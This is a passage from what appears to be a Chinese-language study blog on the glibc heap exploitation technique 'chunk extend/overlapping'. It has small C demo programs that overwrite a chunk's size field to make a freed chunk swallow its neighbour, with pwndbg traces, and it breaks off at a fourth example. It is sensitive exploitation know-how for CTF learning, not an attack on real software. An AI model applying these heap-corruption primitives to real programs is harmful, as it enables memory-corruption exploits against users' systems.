<strong>chunk header 的数据判断 chunk 的使用情况和对 chunk 的前后块进行定位</strong>。简而言之,chunk extend 就是通过控制 size 和 pre_size 域来实现跨越块操作从而导致 overlapping 的。</p><h2 id="example">Example</h2><h3 id="基本示例-1:对-inuse-的-fastbin-进行-extend">基本示例 1:对 inuse 的 fastbin 进行 extend</h3><ul><li>利用的效果是通过更改第一个块的大小来控制第二个块的内容。</li><li><strong>示例都是在 64 位的程序。如果想在 32 位下进行测试,可以把 8 字节偏移改为 4 字节</strong>。</li></ul><div class="code-wrapper"><pre><code class="hljs c"><span class="hljs-type">int</span> <span class="hljs-title function_">main</span><span class="hljs-params">(<span class="hljs-type">void</span>)</span>{ <span class="hljs-type">void</span> *ptr,*ptr1; ptr=<span class="hljs-built_in">malloc</span>(<span class="hljs-number">0x10</span>);<span class="hljs-comment">//分配第一个0x10的chunk</span> <span class="hljs-built_in">malloc</span>(<span class="hljs-number">0x10</span>);<span class="hljs-comment">//分配第二个0x10的chunk</span> *(<span class="hljs-type">long</span> <span class="hljs-type">long</span> *)((<span class="hljs-type">long</span> <span class="hljs-type">long</span>)ptr<span class="hljs-number">-0x8</span>)=<span class="hljs-number">0x41</span>;<span class="hljs-comment">// 修改第一个块的size域</span> <span class="hljs-built_in">free</span>(ptr); ptr1=<span class="hljs-built_in">malloc</span>(<span class="hljs-number">0x30</span>);<span class="hljs-comment">// 实现 extend,控制了第二个块的内容</span> <span class="hljs-keyword">return</span> <span class="hljs-number">0</span>;}</code></pre></div><p>我们进pwndbg中调试一下,观察“当两个 malloc 语句执行之后,堆的内存分布”、“代码中把 chunk1 的 size 域更改为 0x41”、“执行 free 之后,chunk2 与 chunk1 合成一个 0x40 大小的 chunk”和“通过 malloc(0x30) 得到 chunk1+chunk2 的块”;</p><blockquote><p>我分别在 <code>main+22</code> (第一个malloc返回处)、<code>main+36</code>(第二个malloc返回处)、<code>main+51</code>(把 chunk1 的 size 域更改为 0x41后返回处)、<code>main+58</code>(free前)、<code>main+63</code>(free后)和 <code>main+73</code>(通过 malloc(0x30) 得到 chunk1+chunk2 的块前)下断点。</p></blockquote><div class="code-wrapper"><pre><code class="hljs bash">pwndbg> disassemble mainDump of assembler code <span class="hljs-keyword">for</span> <span class="hljs-keyword">function</span> main: 0x0000000000401156 <+0>: endbr64 0x000000000040115a <+4>: push rbp 0x000000000040115b <+5>: mov rbp,rsp 0x000000000040115e <+8>: sub rsp,0x10 0x0000000000401162 <+12>: mov edi,0x10 0x0000000000401167 <+17>: call 0x401060 <malloc@plt> 0x000000000040116c <+22>: mov QWORD PTR [rbp-0x8],rax 0x0000000000401170 <+26>: mov edi,0x10 0x0000000000401175 <+31>: call 0x401060 <malloc@plt> 0x000000000040117a <+36>: mov rax,QWORD PTR [rbp-0x8] 0x000000000040117e <+40>: sub rax,0x8 0x0000000000401182 <+44>: mov QWORD PTR [rax],0x41 0x0000000000401189 <+51>: mov rax,QWORD PTR [rbp-0x8] 0x000000000040118d <+55>: mov rdi,rax 0x0000000000401190 <+58>: call 0x401050 <free@plt> 0x0000000000401195 <+63>: mov edi,0x30 0x000000000040119a <+68>: call 0x401060 <malloc@plt> 0x000000000040119f <+73>: mov QWORD PTR [rbp-0x10],rax 0x00000000004011a3 <+77>: mov eax,0x0 0x00000000004011a8 <+82>: leave 0x00000000004011a9 <+83>: retEnd of assembler dump.pwndbg> b *main+22Breakpoint 1 at 0x40116c: file main.c, line 7.pwndbg> b *main+36Breakpoint 2 at 0x40117a: file main.c, line 10.pwndbg> b *main+51Breakpoint 3 at 0x401189: file main.c, line 12.pwndbg> b *main+58Breakpoint 4 at 0x401190: file main.c, line 12.pwndbg> b *main+63Breakpoint 5 at 0x401195: file main.c, line 13.pwndbg> b *main+73Breakpoint 6 at 0x40119f: file main.c, line 13.pwndbg></code></pre></div><blockquote><p>其实我这里的多下了一个断点,所以我这里c了一次</p></blockquote><div class="code-wrapper"><pre><code class="hljs bash">pwndbg> cContinuing.Breakpoint 2, main () at main.c:1010 *(long long *)((long long)ptr-<span class="hljs-number">0</span>x8)=<span class="hljs-number">0</span>x41;// 修改第一个块的size域LEGEND: STACK | HEAP | CODE | DATA | WX | RODATA─────────────────────────────────────────────────────────────────────[ REGISTERS / show-flags off / show-compact-regs off ]──────────────────────────────────────────────────────────────────────*RAX <span class="hljs-number">0</span>x4042c0 ◂— <span class="hljs-number">0</span> RBX <span class="hljs-number">0</span> RCX <span class="hljs-number">0</span>x21 RDX <span class="hljs-number">0</span> RDI <span class="hljs-number">0</span>*RSI <span class="hljs-number">0</span>x4042d0 ◂— <span class="hljs-number">0</span> R8 <span class="hljs-number">0</span>x21001*R9 <span class="hljs-number">0</span>x4042c0 ◂— <span class="hljs-number">0</span> R10 <span class="hljs-number">0</span>xfffffffffffff000 R11 <span class="hljs-number">0</span>x7ffff7e1ace0 (main_arena+<span class="hljs-number">96</span>) —▸ <span class="hljs-number">0</span>x4042d0 ◂— <span class="hljs-number">0</span> R12 <span class="hljs-number">0</span>x7fffffffdcf8 —▸ <span class="hljs-number">0</span>x7fffffffdfb5 ◂— <span class="hljs-number">0</span>x657a2f656d6f682f ('/home/ze') R13 <span class="hljs-number">0</span>x401156 (main) ◂— endbr64 R14 <span class="hljs-number">0</span>x4030e8 (__do_global_dtors_aux_fini_array_entry) —▸ <span class="hljs-number">0</span>x401120 (__do_global_dtors_aux) ◂— endbr64 R15 <span class="hljs-number">0</span>x7ffff7ffd040 (_rtld_global) —▸ <span class="hljs-number">0</span>x7ffff7ffe2e0 ◂— <span class="hljs-number">0</span> RBP <span class="hljs-number">0</span>x7fffffffdbe0 ◂— <span class="hljs-number">1</span> RSP <span class="hljs-number">0</span>x7fffffffdbd0 {ptr1} ◂— <span class="hljs-number">0</span>x1000*RIP <span class="hljs-number">0</span>x40117a (main+<span class="hljs-number">36</span>) ◂— mov rax, qword ptr [rbp - <span class="hljs-number">8</span>]──────────────────────────────────────────────────────────────────────────────[ DISASM / x86-<span class="hljs-number">64</span> / set emulate on ]───────────────────────────────────────────────────────────────────────────────b+ <span class="hljs-number">0</span>x40116c <main+<span class="hljs-number">22</span>> mov qword ptr [rbp - <span class="hljs-number">8</span>], rax [{ptr}] <= <span class="hljs-number">0</span>x4042a0 ◂— <span class="hljs-number">0</span> <span class="hljs-number">0</span>x401170 <main+<span class="hljs-number">26</span>> mov edi, <span class="hljs-number">0</span>x10 EDI => <span class="hljs-number">0</span>x10 <span class="hljs-number">0</span>x401175 <main+<span class="hljs-number">31</span>> call malloc@plt <malloc@plt> ► <span class="hljs-number">0</span>x40117a <main+<span class="hljs-number">36</span>> mov rax, qword ptr [rbp - <span class="hljs-number">8</span>] RAX, [{ptr}] => <span class="hljs-number">0</span>x4042a0 ◂— <span class="hljs-number">0</span> <span class="hljs-number">0</span>x40117e <main+<span class="hljs-number">40</span>> sub rax, <span class="hljs-number">8</span> RAX => <span class="hljs-number">0</span>x404298 (<span class="hljs-number">0</span>x4042a0 - <span class="hljs-number">0</span>x8) <span class="hljs-number">0</span>x401182 <main+<span class="hljs-number">44</span>> mov qword ptr [rax], <span class="hljs-number">0</span>x41 [<span class="hljs-number">0</span>x404298] <= <span class="hljs-number">0</span>x41b+ <span class="hljs-number">0</span>x401189 <main+<span class="hljs-number">51</span>> mov rax, qword ptr [rbp - <span class="hljs-number">8</span>] RAX, [{ptr}] => <span class="hljs-number">0</span>x4042a0 ◂— <span class="hljs-number">0</span> <span class="hljs-number">0</span>x40118d <main+<span class="hljs-number">55</span>> mov rdi, rax RDI => <span class="hljs-number">0</span>x4042a0 ◂— <span class="hljs-number">0</span>b+ <span class="hljs-number">0</span>x401190 <main+<span class="hljs-number">58</span>> call free@plt <free@plt>b+ <span class="hljs-number">0</span>x401195 <main+<span class="hljs-number">63</span>> mov edi, <span class="hljs-number">0</span>x30 EDI => <span class="hljs-number">0</span>x30 <span class="hljs-number">0</span>x40119a <main+<span class="hljs-number">68</span>> call malloc@plt <malloc@plt>────────────────────────────────────────────────────────────────────────────────────────[ SOURCE (CODE) ]────────────────────────────────────────────────────────────────────────────────────────In file: /home/zer0ptr/Pwn-Research/Heap-overflow-basic/Chunk_extend_overlapping/对inuse的fastbin进行extend/main.c:<span class="hljs-number">10</span> <span class="hljs-number">5</span> void *ptr,*ptr1; <span class="hljs-number">6</span> <span class="hljs-number">7</span> ptr=malloc(<span class="hljs-number">0</span>x10);//分配第一个<span class="hljs-number">0</span>x10的chunk <span class="hljs-number">8</span> malloc(<span class="hljs-number">0</span>x10);//分配第二个<span class="hljs-number">0</span>x10的chunk <span class="hljs-number">9</span> ► <span class="hljs-number">10</span> *(long long *)((long long)ptr-<span class="hljs-number">0</span>x8)=<span class="hljs-number">0</span>x41;// 修改第一个块的size域 <span class="hljs-number">11</span> <span class="hljs-number">12</span> free(ptr); <span class="hljs-number">13</span> ptr1=malloc(<span class="hljs-number">0</span>x30);// 实现 extend,控制了第二个块的内容 <span class="hljs-number">14</span> return <span class="hljs-number">0</span>; <span class="hljs-number">15</span> }────────────────────────────────────────────────────────────────────────────────────────────[ STACK ]────────────────────────────────────────────────────────────────────────────────────────────<span class="hljs-number">00</span>:<span class="hljs-number">0000</span>│ rsp <span class="hljs-number">0</span>x7fffffffdbd0 {ptr1} ◂— <span class="hljs-number">0</span>x1000<span class="hljs-number">01</span>:<span class="hljs-number">0008</span>│-<span class="hljs-number">008</span> <span class="hljs-number">0</span>x7fffffffdbd8 {ptr} —▸ <span class="hljs-number">0</span>x4042a0 ◂— <span class="hljs-number">0</span><span class="hljs-number">02</span>:<span class="hljs-number">0010</span>│ rbp <span class="hljs-number">0</span>x7fffffffdbe0 ◂— <span class="hljs-number">1</span><span class="hljs-number">03</span>:<span class="hljs-number">0018</span>│+<span class="hljs-number">008</span> <span class="hljs-number">0</span>x7fffffffdbe8 —▸ <span class="hljs-number">0</span>x7ffff7c29d90 (__libc_start_call_main+<span class="hljs-number">128</span>) ◂— mov edi, eax<span class="hljs-number">04</span>:<span class="hljs-number">0020</span>│+<span class="hljs-number">010</span> <span class="hljs-number">0</span>x7fffffffdbf0 ◂— <span class="hljs-number">0</span><span class="hljs-number">05</span>:<span class="hljs-number">0028</span>│+<span class="hljs-number">018</span> <span class="hljs-number">0</span>x7fffffffdbf8 —▸ <span class="hljs-number">0</span>x401156 (main) ◂— endbr64<span class="hljs-number">06</span>:<span class="hljs-number">0030</span>│+<span class="hljs-number">020</span> <span class="hljs-number">0</span>x7fffffffdc00 ◂— <span class="hljs-number">0</span>x1ffffdce0<span class="hljs-number">07</span>:<span class="hljs-number">0038</span>│+<span class="hljs-number">028</span> <span class="hljs-number">0</span>x7fffffffdc08 —▸ <span class="hljs-number">0</span>x7fffffffdcf8 —▸ <span class="hljs-number">0</span>x7fffffffdfb5 ◂— <span class="hljs-number">0</span>x657a2f656d6f682f ('/home/ze')──────────────────────────────────────────────────────────────────────────────────────────[ BACKTRACE ]────────────────────────────────────────────────────────────────────────────────────────── ► <span class="hljs-number">0</span> <span class="hljs-number">0</span>x40117a main+<span class="hljs-number">36</span> <span class="hljs-number">1</span> <span class="hljs-number">0</span>x7ffff7c29d90 __libc_start_call_main+<span class="hljs-number">128</span> <span class="hljs-number">2</span> <span class="hljs-number">0</span>x7ffff7c29e40 __libc_start_main+<span class="hljs-number">128</span> <span class="hljs-number">3</span> <span class="hljs-number">0</span>x401095 _start+<span class="hljs-number">37</span>─────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────pwndbg> x/<span class="hljs-number">10</span>gx <span class="hljs-number">0</span>x4042a0<span class="hljs-number">0</span>x4042a0: <span class="hljs-number">0</span>x0000000000000000 <span class="hljs-number">0</span>x0000000000000000<span class="hljs-number">0</span>x4042b0: <span class="hljs-number">0</span>x0000000000000000 <span class="hljs-number">0</span>x0000000000000021<span class="hljs-number">0</span>x4042c0: <span class="hljs-number">0</span>x0000000000000000 <span class="hljs-number">0</span>x0000000000000000<span class="hljs-number">0</span>x4042d0: <span class="hljs-number">0</span>x0000000000000000 <span class="hljs-number">0</span>x0000000000020d31<span class="hljs-number">0</span>x4042e0: <span class="hljs-number">0</span>x0000000000000000 <span class="hljs-number">0</span>x0000000000000000pwndbg></code></pre></div><p>当两个 malloc 语句执行之后,堆的内存分布如上;</p><p>之后,我们把 chunk1 的 size 域更改为 0x41,0x41 是因为 chunk 的 size 域包含了用户控制的大小和 header 的大小。如上所示正好大小为 0x40。在题目中这一步可以由堆溢出得到。</p><div class="code-wrapper"><pre><code class="hljs bash">pwndbg> nBreakpoint 4, 0x0000000000401190 <span class="hljs-keyword">in</span> main () at main.c:1212 free(ptr);LEGEND: STACK | HEAP | CODE | DATA | WX | RODATA─────────────────────────────────────────────────────────────────────[ REGISTERS / show-flags off / show-compact-regs off ]──────────────────────────────────────────────────────────────────────*RAX 0x4042a0 ◂— 0 RBX 0 RCX 0x21 RDX 0*RDI 0x4042a0 ◂— 0 RSI 0x4042d0 ◂— 0 R8 0x21001 R9 0x4042c0 ◂— 0 R10 0xfffffffffffff000 R11 0x7ffff7e1ace0 (main_arena+96) —▸ 0x4042d0 ◂— 0 R12 0x7fffffffdcf8 —▸ 0x7fffffffdfb5 ◂— 0x657a2f656d6f682f (<span class="hljs-string">'/home/ze'</span>) R13 0x401156 (main) ◂— endbr64 R14 0x4030e8 (__do_global_dtors_aux_fini_array_entry) —▸ 0x401120 (__do_global_dtors_aux) ◂— endbr64 R15 0x7ffff7ffd040 (_rtld_global) —▸ 0x7ffff7ffe2e0 ◂— 0 RBP 0x7fffffffdbe0 ◂— 1 RSP 0x7fffffffdbd0 {ptr1} ◂— 0x1000*RIP 0x401190 (main+58) ◂— call free@plt──────────────────────────────────────────────────────────────────────────────[ DISASM / x86-64 / <span class="hljs-built_in">set</span> <span class="hljs-built_in">emulate</span> on ]───────────────────────────────────────────────────────────────────────────────b+ 0x40117a <main+36> mov rax, qword ptr [rbp - 8] RAX, [{ptr}] => 0x4042a0 ◂— 0 0x40117e <main+40> sub rax, 8 RAX => 0x404298 (0x4042a0 - 0x8) 0x401182 <main+44> mov qword ptr [rax], 0x41 [0x404298] <= 0x41b+ 0x401189 <main+51> mov rax, qword ptr [rbp - 8] RAX, [{ptr}] => 0x4042a0 ◂— 0 0x40118d <main+55> mov rdi, rax RDI => 0x4042a0 ◂— 0 ► 0x401190 <main+58> call free@plt <free@plt> ptr: 0x4042a0 ◂— 0b+ 0x401195 <main+63> mov edi, 0x30 EDI => 0x30 0x40119a <main+68> call malloc@plt <malloc@plt>b+ 0x40119f <main+73> mov qword ptr [rbp - 0x10], rax 0x4011a3 <main+77> mov eax, 0 EAX => 0 0x4011a8 <main+82> leave────────────────────────────────────────────────────────────────────────────────────────[ SOURCE (CODE) ]────────────────────────────────────────────────────────────────────────────────────────In file: /home/zer0ptr/Pwn-Research/Heap-overflow-basic/Chunk_extend_overlapping/对inuse的fastbin进行extend/main.c:12 7 ptr=malloc(0x10);//分配第一个0x10的chunk 8 malloc(0x10);//分配第二个0x10的chunk 9 10 *(long long *)((long long)ptr-<span class="hljs-number">0</span>x8)=<span class="hljs-number">0</span>x41;// 修改第一个块的size域 <span class="hljs-number">11</span> ► <span class="hljs-number">12</span> free(ptr); <span class="hljs-number">13</span> ptr1=malloc(<span class="hljs-number">0</span>x30);// 实现 extend,控制了第二个块的内容 <span class="hljs-number">14</span> return <span class="hljs-number">0</span>; <span class="hljs-number">15</span> }────────────────────────────────────────────────────────────────────────────────────────────[ STACK ]────────────────────────────────────────────────────────────────────────────────────────────<span class="hljs-number">00</span>:<span class="hljs-number">0000</span>│ rsp <span class="hljs-number">0</span>x7fffffffdbd0 {ptr1} ◂— <span class="hljs-number">0</span>x1000<span class="hljs-number">01</span>:<span class="hljs-number">0008</span>│-<span class="hljs-number">008</span> <span class="hljs-number">0</span>x7fffffffdbd8 {ptr} —▸ <span class="hljs-number">0</span>x4042a0 ◂— <span class="hljs-number">0</span><span class="hljs-number">02</span>:<span class="hljs-number">0010</span>│ rbp <span class="hljs-number">0</span>x7fffffffdbe0 ◂— <span class="hljs-number">1</span><span class="hljs-number">03</span>:<span class="hljs-number">0018</span>│+<span class="hljs-number">008</span> <span class="hljs-number">0</span>x7fffffffdbe8 —▸ <span class="hljs-number">0</span>x7ffff7c29d90 (__libc_start_call_main+<span class="hljs-number">128</span>) ◂— mov edi, eax<span class="hljs-number">04</span>:<span class="hljs-number">0020</span>│+<span class="hljs-number">010</span> <span class="hljs-number">0</span>x7fffffffdbf0 ◂— <span class="hljs-number">0</span><span class="hljs-number">05</span>:<span class="hljs-number">0028</span>│+<span class="hljs-number">018</span> <span class="hljs-number">0</span>x7fffffffdbf8 —▸ <span class="hljs-number">0</span>x401156 (main) ◂— endbr64<span class="hljs-number">06</span>:<span class="hljs-number">0030</span>│+<span class="hljs-number">020</span> <span class="hljs-number">0</span>x7fffffffdc00 ◂— <span class="hljs-number">0</span>x1ffffdce0<span class="hljs-number">07</span>:<span class="hljs-number">0038</span>│+<span class="hljs-number">028</span> <span class="hljs-number">0</span>x7fffffffdc08 —▸ <span class="hljs-number">0</span>x7fffffffdcf8 —▸ <span class="hljs-number">0</span>x7fffffffdfb5 ◂— <span class="hljs-number">0</span>x657a2f656d6f682f ('/home/ze')──────────────────────────────────────────────────────────────────────────────────────────[ BACKTRACE ]────────────────────────────────────────────────────────────────────────────────────────── ► <span class="hljs-number">0</span> <span class="hljs-number">0</span>x401190 main+<span class="hljs-number">58</span> <span class="hljs-number">1</span> <span class="hljs-number">0</span>x7ffff7c29d90 __libc_start_call_main+<span class="hljs-number">128</span> <span class="hljs-number">2</span> <span class="hljs-number">0</span>x7ffff7c29e40 __libc_start_main+<span class="hljs-number">128</span> <span class="hljs-number">3</span> <span class="hljs-number">0</span>x401095 _start+<span class="hljs-number">37</span>pwndbg> x/<span class="hljs-number">4</span>gx <span class="hljs-number">0</span>x404290<span class="hljs-number">0</span>x404290: <span class="hljs-number">0</span>x0000000000000000 <span class="hljs-number">0</span>x0000000000000041<span class="hljs-number">0</span>x4042a0: <span class="hljs-number">0</span>x0000000000000000 <span class="hljs-number">0</span>x0000000000000000</code></pre></div><blockquote><p>这里小回顾一下chunk的结构,就可以解释为什么是看 <code>0x404290</code> 这个地址了(这个地址是chunk的prev_size,而我们修改的就是size域),下面是一张参考图:</p></blockquote><p><img src="/images/chunk_extend_overlapping/1.png" alt="当前chunk结构"></p><p>执行 free 之后,我们可以看到 chunk2 与 chunk1 合成一个 0x40 大小的 chunk,一起释放了:</p><div class="code-wrapper"><pre><code class="hljs bash">pwndbg> binstcachebins0x40 [ 1]: 0x4042a0 ◂— 0fastbinsemptyunsortedbinemptysmallbinsemptylargebinsempty</code></pre></div><p>之后我们通过 malloc(0x30) 得到 chunk1+chunk2 的块,此时就可以直接控制 chunk2 中的内容,我们也把这种状态称为 overlapping chunk。</p><h3 id="基本示例-2:对-inuse-的-smallbin-进行-extend">基本示例 2:对 inuse 的 smallbin 进行 extend</h3><p>通过之前深入理解堆的实现部分的内容,我们得知处于 fastbin 范围的 chunk 释放后会被置入 fastbin 链表中,而不处于这个范围的 chunk 被释放后会被置于 unsorted bin 链表中。 以下这个示例中,我们使用 0x80 这个大小来分配堆(作为对比,fastbin 默认的最大的 chunk 可使用范围是 0x70)</p><div class="code-wrapper"><pre><code class="hljs c"><span class="hljs-comment">// gcc -g test2.c -o test2</span><span class="hljs-meta">#<span class="hljs-keyword">include</span> <span class="hljs-string"><stdio.h></span></span><span class="hljs-type">int</span> <span class="hljs-title function_">main</span><span class="hljs-params">()</span> { <span class="hljs-type">void</span> *test, *test1; test = <span class="hljs-built_in">malloc</span>(<span class="hljs-number">0x80</span>); <span class="hljs-comment">// 分配第一个 0x80 的chunk1</span> <span class="hljs-built_in">malloc</span>(<span class="hljs-number">0x10</span>); <span class="hljs-comment">// 分配第二个 0x10 的chunk2s</span> <span class="hljs-built_in">malloc</span>(<span class="hljs-number">0x10</span>); <span class="hljs-comment">// 防止与top chunk合并</span> *(<span class="hljs-type">long</span>*)((<span class="hljs-type">long</span>)test<span class="hljs-number">-0x8</span>) = <span class="hljs-number">0xb1</span>; <span class="hljs-built_in">free</span>(test); test1 = <span class="hljs-built_in">malloc</span>(<span class="hljs-number">0xa0</span>);}</code></pre></div><p>在这个例子中,因为分配的 size 不处于 fastbin 的范围,因此在释放时如果与 top chunk 相连会导致和 top chunk 合并。所以我们需要额外分配一个 chunk,把释放的块与 top chunk 隔开。</p><p>我们进gdb中观察一下:</p><div class="code-wrapper"><pre><code class="hljs bash">pwndbg> b 9Breakpoint 1 at 0x11a6: file main.c, line 9.pwndbg> r·········────────────────────────────────────────────────────────────────────────────────────────In file: /home/zer0ptr/Pwn-Research/Heap-overflow-basic/Chunk_extend_overlapping/对inuse的smallbin进行extend/main.c:9 4 int <span class="hljs-function"><span class="hljs-title">main</span></span>() { 5 void *<span class="hljs-built_in">test</span>, *test1; 6 <span class="hljs-built_in">test</span> = malloc(0x80); // 分配第一个 0x80 的chunk1 7 malloc(0x10); // 分配第二个 0x10 的chunk2s 8 malloc(0x10); // 防止与top chunk合并 ► 9 *(long*)((long)test-<span class="hljs-number">0</span>x8) = <span class="hljs-number">0</span>xb1; <span class="hljs-number">10</span> free(test); <span class="hljs-number">11</span> test1 = malloc(<span class="hljs-number">0</span>xa0); <span class="hljs-number">12</span> }·········────────────────────────────────────────────────────────────────────────────────────────────pwndbg> i r raxrax <span class="hljs-number">0</span>x555555559298 <span class="hljs-number">93824992252568</span>pwndbg> x/<span class="hljs-number">30</span>gx <span class="hljs-number">0</span>x555555559298<span class="hljs-number">0</span>x555555559298: <span class="hljs-number">0</span>x00000000000000b1 <span class="hljs-number">0</span>x0000000000000000<span class="hljs-number">0</span>x5555555592a8: <span class="hljs-number">0</span>x0000000000000000 <span class="hljs-number">0</span>x0000000000000000<span class="hljs-number">0</span>x5555555592b8: <span class="hljs-number">0</span>x0000000000000000 <span class="hljs-number">0</span>x0000000000000000<span class="hljs-number">0</span>x5555555592c8: <span class="hljs-number">0</span>x0000000000000000 <span class="hljs-number">0</span>x0000000000000000<span class="hljs-number">0</span>x5555555592d8: <span class="hljs-number">0</span>x0000000000000000 <span class="hljs-number">0</span>x0000000000000000<span class="hljs-number">0</span>x5555555592e8: <span class="hljs-number">0</span>x0000000000000000 <span class="hljs-number">0</span>x0000000000000000<span class="hljs-number">0</span>x5555555592f8: <span class="hljs-number">0</span>x0000000000000000 <span class="hljs-number">0</span>x0000000000000000<span class="hljs-number">0</span>x555555559308: <span class="hljs-number">0</span>x0000000000000000 <span class="hljs-number">0</span>x0000000000000000<span class="hljs-number">0</span>x555555559318: <span class="hljs-number">0</span>x0000000000000000 <span class="hljs-number">0</span>x0000000000000000<span class="hljs-number">0</span>x555555559328: <span class="hljs-number">0</span>x0000000000000021 <span class="hljs-number">0</span>x0000000000000000<span class="hljs-number">0</span>x555555559338: <span class="hljs-number">0</span>x0000000000000000 <span class="hljs-number">0</span>x0000000000000000<span class="hljs-number">0</span>x555555559348: <span class="hljs-number">0</span>x0000000000000021 <span class="hljs-number">0</span>x0000000000000000<span class="hljs-number">0</span>x555555559358: <span class="hljs-number">0</span>x0000000000000000 <span class="hljs-number">0</span>x0000000000000000<span class="hljs-number">0</span>x555555559368: <span class="hljs-number">0</span>x0000000000020ca1 <span class="hljs-number">0</span>x0000000000000000<span class="hljs-number">0</span>x555555559378: <span class="hljs-number">0</span>x0000000000000000 <span class="hljs-number">0</span>x0000000000000000</code></pre></div><p>其中,chunk1如下:</p><div class="code-wrapper"><pre><code class="hljs bash">0x555555559298: 0x00000000000000b1 0x00000000000000000x5555555592a8: 0x0000000000000000 0x00000000000000000x5555555592b8: 0x0000000000000000 0x00000000000000000x5555555592c8: 0x0000000000000000 0x00000000000000000x5555555592d8: 0x0000000000000000 0x00000000000000000x5555555592e8: 0x0000000000000000 0x00000000000000000x5555555592f8: 0x0000000000000000 0x00000000000000000x555555559308: 0x0000000000000000 0x00000000000000000x555555559318: 0x0000000000000000 0x0000000000000000</code></pre></div><p>chunk2:</p><div class="code-wrapper"><pre><code class="hljs bash">0x555555559328: 0x0000000000000021 0x00000000000000000x555555559338: 0x0000000000000000 0x0000000000000000</code></pre></div><p>用于隔离 top_chunk 的chunk(那它下面那个就是top chunk啦!):</p><div class="code-wrapper"><pre><code class="hljs bash">0x555555559328: 0x0000000000000021 0x00000000000000000x555555559338: 0x0000000000000000 0x0000000000000000</code></pre></div><p>接下来在第10行处下断点,执行<code>*(int *)((int)test-0x8) = 0xb1;</code>这段代码:</p><div class="code-wrapper"><pre><code class="hljs bash">pwndbg> x/30gx 0x5555555592980x555555559298: 0x00000000000000b1 0x00000005555555590x5555555592a8: 0xe1643fe79a375a5e 0x00000000000000000x5555555592b8: 0x0000000000000000 0x00000000000000000x5555555592c8: 0x0000000000000000 0x00000000000000000x5555555592d8: 0x0000000000000000 0x00000000000000000x5555555592e8: 0x0000000000000000 0x00000000000000000x5555555592f8: 0x0000000000000000 0x00000000000000000x555555559308: 0x0000000000000000 0x00000000000000000x555555559318: 0x0000000000000000 0x00000000000000000x555555559328: 0x0000000000000021 0x00000000000000000x555555559338: 0x0000000000000000 0x00000000000000000x555555559348: 0x0000000000000021 0x00000000000000000x555555559358: 0x0000000000000000 0x00000000000000000x555555559368: 0x0000000000020ca1 0x00000000000000000x555555559378: 0x0000000000000000 0x0000000000000000pwndbg> binAmbiguous <span class="hljs-built_in">command</span> <span class="hljs-string">"bin"</span>: binder, bins.pwndbg> binstcachebins0xb0 [ 1]: 0x5555555592a0 ◂— 0fastbinsemptyunsortedbinemptysmallbinsemptylargebinsemptypwndbg>tcachebins0xb0 [ 1]: 0x5555555592a0 ◂— 0fastbinsemptyunsortedbinemptysmallbinsemptylargebinsemptypwndbg></code></pre></div><p>没有得到预期的结果,根据 <code>tcachebins</code> 猜测是因为使用了新版本的glibc导致,但我们仍然可以根据参考文章中学习其思路;</p><p><img src="/images/chunk_extend_overlapping/2.png" alt="执行后chunk结构"></p><p>和前面的例子一样,<code>*(int *)((int)test-0x8) = 0xb1;</code>这段代码也是将chunk1的size部分进行了更改,将原有的0x90扩展到了0xb0。这就导致了chunk2被chunk1所包含。接下来我们在第11行下断点释放chunk1:</p><p><img src="/images/chunk_extend_overlapping/3.png" alt="chunk1释放后chunk结构和bins"></p><p>这里解释一下为什么进的是unsortbin,有两种情况下进unsortbin:</p><ul><li>当一个较大的 chunk 被分割成两半后,如果剩下的部分大于 MINSIZE,就会被放到 unsorted bin 中</li><li>释放一个不属于 fast bin 的 chunk,并且该 chunk 不和 top chunk 紧邻时,该 chunk 会被首先放到 unsorted bin 中</li></ul><p>那么这个例子就满足第二种情况,不属于fastbin中的空闲块,并且不和top chunk相邻。其实这个例子和第一个例子差不多,因为chunk1和chunk2合并之后的chunk的大小超过了fast bin的最大接收值,所以不进fast bin,并且chunk3的size标志位变成了0,证明前一个块chunk2是一个释放的状态。接下来的过程也是一样的,再次申请一个0xa0大小的chunk时,会从unsort bin中提取。连带着chunk2中的内容也会被提取出来,这样一来再次对chunk1进行操作,从而达到操作chunk2的目的。</p><h3 id="基本示例-3:对-free-的-smallbin-进行-extend">基本示例 3:对 free 的 smallbin 进行 extend</h3><div class="code-wrapper"><pre><code class="hljs c"><span class="hljs-comment">//gcc -g test3 -o test3</span><span class="hljs-meta">#<span class="hljs-keyword">include</span><span class="hljs-string"><stdio.h></span></span><span class="hljs-type">int</span> <span class="hljs-title function_">main</span><span class="hljs-params">()</span>{ <span class="hljs-type">void</span> *test, *test1; test = <span class="hljs-built_in">malloc</span>(<span class="hljs-number">0x80</span>);<span class="hljs-comment">//分配第一个0x80的chunk1</span> <span class="hljs-built_in">malloc</span>(<span class="hljs-number">0x10</span>);<span class="hljs-comment">//分配第二个0x10的chunk2</span> <span class="hljs-built_in">free</span>(test);<span class="hljs-comment">//首先进行释放,使得chunk1进入unsorted bin</span> *(<span class="hljs-type">long</span> *)((<span class="hljs-type">long</span>)test - <span class="hljs-number">0x8</span>) = <span class="hljs-number">0xb1</span>; test1 = <span class="hljs-built_in">malloc</span>(<span class="hljs-number">0xa0</span>);}</code></pre></div><p>第三个例子和前面两个有一些区别,前面两个都是先修改chunk1的size大小然后进行释放,但是这个例子是先进行释放,然后重新修改chunk1的size大小,依然还是一步一步来,首先在第8行下断点,使程序完成申请chunk的操作:</p><p><img src="/images/chunk_extend_overlapping/4.png" alt="程序完成申请chunk操作后chunk结构"></p><p>接下来我们在第9行下断点,使程序完成对chunk1的释放:</p><p><img src="/images/chunk_extend_overlapping/5.png" alt="程序完成释放chunk1操作后chunk结构"></p><p>没有什么意外,释放之后的chunk1依然进入了unsort bin中。接下来 我们将断点下载第10行,需要注意的是此时更改size大小的操作是在free之后完成的:</p><p><img src="/images/chunk_extend_overlapping/6.png" alt="经过free后更改size操作的chunk结构"></p><p>此时再进行 malloc 分配就可以得到 chunk1+chunk2 的堆块,从而控制了 chunk2 的内容。</p><blockquote><p>在修改完size之后重新申请0xa0的时候会从unsort bin中申请,这个时候大家需要总结一下,其实各个bin中存放的只有chunk的首地址,真正判断多大还得是去看这个chunk的size大小,所以再次申请的时候依然还可以对chunk2进行控制</p></blockquote><h3 id="基本示例-4:通过-extend-后向-overlapping">基本示例 4:通过 extend 后向 overlapping</h3><p>这里展示通过 extend 进行后向 overlapping,这也是在 CTF 中最常出现的情况,通过 overlapping 可以实现其它的一些利用。</p><div class="code-wrapper"><pre><code class="hljs c"><span class="hljs-meta">#<span class="hljs-keyword">include</span> <span class="hljs-string"><stdio.h></span></span><span class="hljs-type">int</span> <span class="hljs-title function_">main</span><span class="hljs-params">()</span>{ <span 